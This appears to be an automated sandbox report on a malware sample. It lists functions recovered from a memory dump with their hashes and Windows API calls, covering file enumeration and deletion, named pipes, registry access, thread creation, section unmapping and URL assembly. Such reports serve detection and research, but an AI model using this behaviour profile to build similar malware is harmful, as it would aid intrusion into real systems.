  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
